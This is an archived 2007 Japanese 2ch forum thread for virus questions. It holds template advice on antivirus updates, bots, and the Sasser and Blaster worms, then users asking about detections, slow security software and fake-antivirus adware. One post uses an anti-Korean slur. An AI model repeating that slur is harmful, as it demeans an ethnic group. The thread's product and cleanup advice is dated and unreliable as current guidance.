[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 02/27 13:30 / Filesize : 222 KB / Number-of Response : 717
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

【ウィルス情報質問 総合スレッド★Part43】



1 名前: ◆N9P3SuvBPo mailto:sage [2007/05/01(火) 17:54:06 ]
前スレ = 【ウィルス情報質問 総合スレッド★Part42】
      pc11.2ch.net/test/read.cgi/sec/1171809750/

★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」 
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」 
【スパイウェア対策ソフト】 「」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」

【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」

テンプレは>>2-13

2 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:17:24 ]
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 www.trendmicro.co.jp/home/
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

3 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:17:59 ]
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

4 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:18:39 ]
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security

5 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:19:13 ]
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

6 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:19:47 ]
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

7 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:20:20 ]
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

8 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:20:55 ]
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
tmp6.2ch.net/test/read.cgi/download/1170937127/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
pc10.2ch.net/test/read.cgi/sec/1169042051/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
pc10.2ch.net/test/read.cgi/sec/1162181635/

9 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:21:30 ]
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
www.viruschaser.jp/support_online.html

関連スレッド
オンラインによるウイルスチェックサービス
pc10.2ch.net/test/read.cgi/sec/1031073684/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします

10 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:22:28 ]
関連スレッド
セキュリティ初心者質問スレッドpart82
pc10.2ch.net/test/read.cgi/sec/1171285882/
Winnyを狙ったワーム・ニュイルス情報 Part60
tmp6.2ch.net/test/read.cgi/download/1170937127/
☆☆トロイの木馬☆☆4台目
pc10.2ch.net/test/read.cgi/sec/1171000137/
sasser【スタコラサッサ】sasser Part2
pc10.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
pc10.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
pc10.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
pc10.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
pc10.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
pc10.2ch.net/test/read.cgi/sec/1091346741/

関連スレは次スレに移行してる場合もあります。

質問する前に検索しましょう
www.yahoo.co.jp/
www.google.co.jp/



11 名前:名無しさん@お腹いっぱい。 [2007/05/01(火) 20:25:18 ]
テンプレはここまで!

| ヽ|      |_    「 〉
⊥ 人_   _|_    |/
               O

関連スレのリンク切れの修正はお願いします。
疲れたな・・・・あとは任せる

12 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:25:59 ]
黄金週間中なのに乙

13 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:34:08 ]
P2P(Winny、Share、etc.)ウイルスは板違い。移動しろ。
たとえアップローダで踏んだとしても移動しろ。

Download
tmp6.2ch.net/download/

キンタマ、山田、ニュイルスなどでスレ探せ。

14 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 20:39:13 ]
>>13
■P2Pでウイルスに感染した人へ■
『自力で解決を図るか、それが出来ないならリカバリ(OS再インストール)して下さい』

Q.バックアップを取るのを忘れてしまったのですが…
A.勉強だと思って諦めてください
Q.何とかなりませんかねー?
A.P2P使用による感染のサポートはここでは一切しておりません
Q.そこを何とか!
A.ではこちらへ↓Winnyを狙ったワーム・ニュイルス情報 Part61
         tmp6.2ch.net/test/read.cgi/download/1175566815/

これだろ、前スレ>>992の希望で削除されたみたい

15 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 21:18:08 ]
>>14
992のは、★質問用テンプレ★ が、1と被ってるから、要らないと言ったんじゃないのか?

16 名前:名無しさん@お腹いっぱい。 [2007/05/01(火) 21:40:25 ]
アップローダで踏んだケースも板違いだ、移動しろというのはいかがなものか。



17 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 21:42:53 ]
>>15
そっか、次回からテンプレは12で収まるな

18 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 22:08:23 ]
>>16
キンタマや山田や原田をここで延々やるのも違うだろ?

19 名前:補足の参考情報 mailto:sage [2007/05/01(火) 22:08:31 ]



■2007年2月最新の総合的なアンチウイルス性能テスト結果。
 (av-comparatives.orgという専門組織のテスト)

※ウイルス定義パターン検出+ヒューリスティック検出の総合性能※
pc11.2ch.net/test/read.cgi/sec/1087037111/336






20 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 23:14:53 ]
>>18
確かにな。ノウハウもあっちのがあるし



21 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 23:17:37 ]
【使用OS】xp 
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 avst
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 spy-bot ad-ware 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 有り
【症状】 ad-wareでスキャンしたら『win32.hacktool.toolevld』っていうのが見つかりました
ググっても英語でぜんぜんわかりません
どういうウイルスなのかおしえてください


22 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 23:40:14 ]
>>21
アドで検出されたんならスパイウェアです

23 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/01(火) 23:52:55 ]
>>21
『win32.hacktool.toolevld』自動翻訳
ttp://translate.google.com/translate?hl=ja&sl=en&u=www.lavasoftsupport.com/lofiversion/index.php/t3388.html&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dhacktool%2Btoolevld%26hl%3Dja%26lr%3D
フォーラム自動翻訳
ttp://translate.google.com/translate?hl=ja&sl=en&u=www.lavasoftsupport.com/index.php%3Fshowtopic%3D3388%26mode%3Dthreaded&sa=X&oi=translate&resnum=2&ct=result&prev=/search%3Fq%3Dhacktool%2Btoolevld%26hl%3Dja%26rlz%3D1T4GGLJ_jaJP209JP209

24 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 09:19:47 ]
★質問用テンプレ★  長いけれどよろしくです!
【使用OS】 XP SP2 P4 2GHz-M 512GB
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 VB2007だが 教えて欲しい
【ルータの有無】 牛社製あり

【どんな症状が出るか】 UVを外すと当時のように軽くなり、モッサリの元凶がUVソフトと感じた。
【その他の質問】 

上記のPCでVBやノートン、Mcfなど最近のものを入れるととてもストレスが溜まる。
なまじ X2 5000+ 2GBなどと同時に使っていると尚ストレスが溜まる。
ある日リカバリ環境復元後UVなしで使っているとあまりの軽さに驚くとともにUVソフトの影響度が高いことを認識した。

そこで質問ですが、
上記のような現在では低スペックのPCでも低負荷なUVソフトはずばりどんなものでしょうか?
有償無償版問いません。 ですが、あえて有償版で軽快が売りのものは存在しますか? 
尚UV機能とFW機能のみ実装で設定はデフォとして。

それから
華美なGUIなどを廃した低スペック専用バージョンというのは有償版で存在しますか?
なければ無償版含めてある程度のUV効果を期待でき、軽快さに比重を置いたお勧めのソフト及び設定はありますか?

●日々増殖してゆくマルウエアに対しては、UVソフト自体が高負荷化するのは仕方のないことなのですか?
教えてください・・・

25 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 09:44:42 ]
UVソフトファンデーションはお肌の味方です

26 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 10:19:23 ]
>>24
カスペは軽いよ

27 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 10:52:06 ]
>>26
情報ありがとうございます。
カスペはオンラインでしか使ったことがありませんが、巷?の評判は良いようですね。

実際使わないと判断できかねると思いますが、提灯臭くない客観的に比較しているサイト、
優位性を含んだ記述のあるソースを教えていただけないでょうか。

お時間があればでけっこうです。


28 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 11:30:20 ]
>>27
ttp://www4.pf-x.net/~zot/index.htm

29 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 12:31:05 ]
>>27
ttp://ratan.dyndns.info/avast4/virusest.html

30 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 12:43:26 ]
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:29/デコチヤン)
・KIS7まだ? (2007/04/14(土) 21:17)



31 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 12:47:01 ]
28 29さん ご紹介ありがとうございます。
さっそく拝見させていただきます。 お手数お掛けしました。

32 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 12:49:49 ]
>優位性を含んだ記述のあるソースを教えていただけないでょうか。

宣伝乙w

33 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 12:57:41 ]
変な言い掛かり付けるより、自分も宣伝してみたらー?

34 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 13:02:15 ]
>>26
カスは重いソフト第3位
gigazine.net/index.php?/news/comments/20060911_system_delay/

どうしてもこの事実を抹消させたいカス業者工作員(笑)

35 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 13:07:12 ]
カトチヤンとデコチヤンは同一人物だよね

36 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 13:08:14 ]
>優位性を含んだ記述のあるソースを教えていただけないでょうか。

37 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 13:09:29 ]
>>26=>>34

滓な濃度32厨の自演工作 カワイソ(´・ω・) ス



38 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 13:09:47 ]
宣伝してやろうか?

39 名前:24 27 31 mailto:sage [2007/05/02(水) 14:33:59 ]
>25
これは恥ずかしい(^^ゞ anti のAでした。 A/Vでした。

>32
なぜ?と思いましたが、結果的に宣伝になってしまうんですね。
でも精度の高い情報が欲しかったのです。

>28 29さん
一通り拝見させていただきました。
今使ってるものは VB2007 McA2007 Norton I/S2005
動作マシンスペックに依れど、或いは使わないものは切り捨ててもどれも軽快な感じは受けません。
更に環境内容に因っても体感的に変わってくるのかも知れませんね・・・

やはり素人使用に於いては検出力、防御力などが優れているものは重くなってもしょうがない、
それを回避するならば高スペックのPCに変えるのが得策と考えるべきでしょうか。


40 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 14:49:37 ]
>>39
同じようなスペックだけどNIS2005からKIS6に乗り換えたら軽くて驚いた。




41 名前:24 27 31 39 mailto:sage [2007/05/02(水) 14:57:21 ]
>>40
KIS6とはカスペでしょうか。
論より証拠 やはり一度使ってみてからでしょうか。
その上でまた不満があればいろいろ模索してみようと思います。

というか体験版があったような気がしますのでそれで様子を見てみます。
ご助言感謝します。

42 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 15:16:54 ]
と、幼稚な自演で取り繕おうとする劇団ひとりでしたw




43 名前: ◆N9P3SuvBPo mailto:sage [2007/05/02(水) 17:56:16 ]
明日から連休だ〜
テンプレ貼ってくれた人お疲れ様。

>24
本当はセキュ質スレ向けの質問なんだけど…まあ
>【使用OS】 XP SP2 P4 2GHz-M 512GB
メモリが512GBってw、512MBだよな。
それで、アンチウイルス(総合型セキュリティソフト)を入れると、モッサリするってね。
常駐型セキュリティソフト入れれば重くなるのは当たり前だ。

>尚UV機能とFW機能のみ実装で設定はデフォとして。
必要最小限の機能で使うのなら今のメモリでも問題無いんだけど、
デフォルトの設定だとな〜…やっぱり、メモリを増設するしかないかもな。

俺だったら、必要の無い常駐ソフトやサービスを無効にするな。

44 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 18:26:10 ]
gigazine.net/index.php?/news/comments/20060720_malware/
悪意あるソフトの80%はアンチウイルスソフトが効かない

これ見るとウィルスソフトなんてどれでもいいって気になるw

45 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 21:58:36 ]
QuickTime7.1.6出てるな

46 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 22:00:32 ]
というか端から思ってたけど、デジタルで完璧なんてありえんよね
個人情報保護なんて建前だけでダダ漏れでしょw
そもそもアンチウイルスソフトすらまともに入れていない一般人が多いんじゃないかな
だいたいでなんとかカワセんじゃねか 運次第w

47 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 22:36:33 ]
「TROJ_VB.CZJ」
こんな名前のウイルスに感染したようです。
何か情報あったら教えて。

48 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 22:55:38 ]
>>47
つtp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FVB%2ECZJ&VSect=P

49 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 23:22:25 ]

>>48
ありがとう。
んんん何がどーなるのか、どーすればいいのか、
わからん。

50 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 23:31:16 ]
多分こうじゃないか
1.アップデートでVBを最新
2.スキャンで感染したファイルを特定
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除



51 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 23:37:38 ]
1.アップデートでVBを最新
avast・ノートンの最新にはありませんでした。
2.スキャンで感染したファイルを特定
ウイルスバスター オンラインスキャンでファイル名がわかりました。

3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
どうやるんですか?
本当にわかりません。


52 名前:名無しさん@お腹いっぱい。 [2007/05/02(水) 23:39:49 ]
書き忘れました。
ウイルスバスターでの対処法は英語のみでわかりませんでした。

53 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/02(水) 23:47:45 ]
Windows 98、MEなら
CTRL+ALT+DELETE
Windows NT, 2000, XP, Server 2003なら
CTRL+SHIFT+ESCと書いてあるけどウチのXPでは起動しなかったので
CTRL+ALT+DELETEでタスクマネージャを選択してプロセスタブ
イメージ名をクリックするとABC順に並んで見やすくなる
この中にあってはならないプロセス(マルウエア)があったら終了させる
どれがマルウェアかは俺にも分らんがw

感染ファイル削除もVB上で行うのかエクスプローラから削除するのかも分らん
と言うことでVBからの削除が出来なかったらエクスプローラからの削除を試みれば?

54 名前:名無しさん@お腹いっぱい。 [2007/05/03(木) 00:38:39 ]
ありがとうございます。
エクスプローラから削除してみます。

55 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/03(木) 13:56:05 ]
Trend Flex Security オンラインスキャンを実行したところ
TSPY_Banker.BF というスパイウェアが検出されましたが、
どのファイルがスパイウェアなのか表示されませんでした。
スパイウェアのファイル名を知る方法はありませんか?


56 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 21:42:15 ]
別にウイルスというほどのものではないが、

3台のPCのうち2台のPCのキーボードがいつの間にか106タイプじゃなくなっていて、日本語タイプの時に多少支障が出た。
ドライバ変更で対処しようとしたが、かたや106がリスト表示になく、もう一つは変更してもダメだった。

しかたなくレジストリから変更をやってみようとして、エディタを開き該当フォルダ内を見てびっくり。
「LayerDriver JPN」の他にもう一つ「LayerDriver KOR」が存在した。よく調べりゃ3台全部に。

こんなところに糞コリアンが隠れていようとは・・・レジストリに寄生するゴミなので早速削除。
まったく油断も隙もない。

57 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:15:53 ]
で?
オチは?

58 名前:名無しさん@お腹いっぱい。 [2007/05/04(金) 23:29:50 ]
【使用OS】xp 
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 ノートン2005 ver最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 ad-aware 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 なし
【症状】 定期的にdrive cleanerの宣伝告知がアラート音と共に表示され、たまに海外サイトのエロHPが表示されて困ってます。
アンチスパイウェアで掃除しても定期的にスパイウェアが放り込まれてキリがありません…。
ウイルスソフトで駆除も行った所、色々見つかったので削除したんですが、kbdcui.dllがtrojan horseに感染しているらしく、先生でも検疫できず、セーフモードで削除しようとしても削除できませんでした。
検索しても対処法が見つからずに困っています。どなたか退治法を教えていただけないでしょうかorz

59 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:37:26 ]
書き忘れ…フルパスはC:\WINDOWS\system32\kbdcui.dll です
WinAntiVirus PROの広告が表示されるのも忘れてましたorz

60 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:40:35 ]
>>58
WinAntiVirus PROで・・・
定番過ぎて



61 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:48:02 ]
定番すぎでしたか…
drive cleanerもWinAntiVirus PROも警告が怪しすぎたのでダウンロードもインストもしなかったんですが…
過去ログも見れないし…リカバリしかないんですかね…orz

62 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:48:42 ]
>>58
こっちが専用スレ
pc11.2ch.net/test/read.cgi/sec/1162464139/

63 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:53:10 ]
>>61
adだけなのぉてspy-botやら
他のでも試し、
ほんでな、システムの復元は切っとかんと
復活しよるもんもあるで
まぁ、削除後は怪しげな単語で検索してみ
あったら手動で削除
気ぃ落とさんと気長にやり

64 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:56:34 ]
kbdcui.dllがトロイっぽかったのでこっちかと思いました…
誘導感謝ですm(_ _)m


65 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/04(金) 23:57:43 ]
>>62 >>63
他のソフトでも試してみます。重ね重ねありがとうございましたm(_ _)m

66 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 00:03:41 ]
ファイル消せないだけならunlockerで大抵のものは消せると思うけど
xp-delete.hp.infoseek.co.jp/tips.html

あとvundo fix を試す
www.higaitaisaku.com/vundofix.html

xpをsp2にしてMS update
できればルーターもいれといたほうがいい

67 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 00:09:04 ]
>>58
Symantec - サポート
ttp://www.symantec.com/ja/jp/home_homeoffice/support/index.jsp
■ウイルスとリスク (スパイウェア & ウイルス駆除の相談)

68 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/05/05(土) 00:40:37 ]
>>58
2005はスパイウェアを検出できても駆除は無理だよ

